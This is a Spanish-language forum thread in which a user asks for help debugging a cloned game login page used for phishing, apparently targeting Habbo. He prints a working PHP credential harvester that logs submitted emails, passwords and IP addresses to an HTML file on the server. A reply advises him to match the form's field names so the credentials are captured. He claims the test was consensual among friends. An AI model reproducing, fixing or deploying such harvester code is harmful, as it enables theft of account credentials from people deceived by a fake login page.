Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: XxELIT3xX en 9 Enero 2015, 23:33 pm



Título: experimento de phishig fallido
Publicado por: XxELIT3xX en 9 Enero 2015, 23:33 pm
 Hola a todos amigos, este es mi primer post en este foro, aunque os llevo leyendo desde hace mucho tiempo pero hoy he decidido lanzarme a preguntar una pregunta.
Resulta que mi amigo y yo decidimos hacerle una broma a otro amigo, pero investigando nos topamos con eso del phishing e investigamos.Una vez sabiamos que era eso decidimos ponerlo en practica para saber si era cierto que existia una forma do clonar una pagina de una forma tan real, lo probamos entre nosotros en un JUEGO cosa que supongo que si lo hacemos con el consentimiento de los 2 no ocurre nada...
bueno pues, una vez teniamos el index.html y el post.php o login.php (el nombre cambiaba porque probabamos con todos los php que veiamos de videos de como hacer phishing en facebook sin hacerlo a facebook, solo cogiendo el php para luego usarlo hacioendo el phishing entre nosotros con la pagina del juego)el php que tenemso actualmente crea un archivo html (passw0rds14.html) en el servidor que podemos ver.bueno, hosteamos el server en hostinger, lo subimos con filezilla, lo poniamos en practica pero no cogia los datos...
lo que cogia era la ip solo, dejando esta secuencia:

Email: [] Password: [] IP: [XX.XXX.XXXXXX]

la IP si que me la registra (la tapo porque es la del ordenador de mi amigo jejej)
pero luego me fije en algo... el php que cogimos de videos de hacer phishing a facebook tenia la siguiente secuencia:

Código
  1. <?php
  2.  
  3. $habbo = $_POST['email'];
  4.  
  5. $password = $_POST['pass'];
  6.  
  7. $ip = $_SERVER['REMOTE_ADDR'];
  8.  
  9. $f = fopen("passw0rds14.html", "a");
  10.  
  11. fwrite ($f, 'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
  12.  
  13. fclose($f);



SIN ESPACIOS (no se si tendra algo que ver, pero yo aclaro...)
bueno, si os fijais tiene

Código
  1. $habbo = $_POST['email'];
  2.  
  3. $password = $_POST['pass'];
  4.  
  5. $ip = $_SERVER['REMOTE_ADDR'];

que seria para captar el email, la pass, y la ip.
pero el juego lo que pide para loguearse es USER, no email... asi que no se si
$habbo = $_POST['email'];  es lo que falla ahi... pero de todas formas solo falla eso, la contraseña si que me la pide el juego, sin embargo el php tampoco me capta la pass...

¿es $habbo = $_POST['email'];  lo que esta fallando?  :huh:
PD:si, he editado el index.html cambiando lo siguient de las palabras action y he puesto el login/post.php

ayudenme pls

insisto que no es con fines malos, de hecho creo que voy a empezar en esto del hacking etico creo que se llama, ya que me ha llamado muchisimo la atencion como existen este tipo de paginas fraudulentas tan... EXACTAS a las deverdad.

FELIZ AÑO NUEVOOOO JEJEJEJ  :rolleyes:



Título: Re: experimento de phishig fallido
Publicado por: engel lex en 9 Enero 2015, 23:40 pm
Modifiqué el post, por favor cuando publiques codigo, usa las etiquetas GeSHi

eso no se hace a ciegas... necesitas ver el form que hace el post en el primer html para saber que dato capturar de los pasados...


Título: Re: experimento de phishig fallido
Publicado por: tywors en 20 Febrero 2016, 16:56 pm
Phishing a Habbo en 2016?  :rolleyes: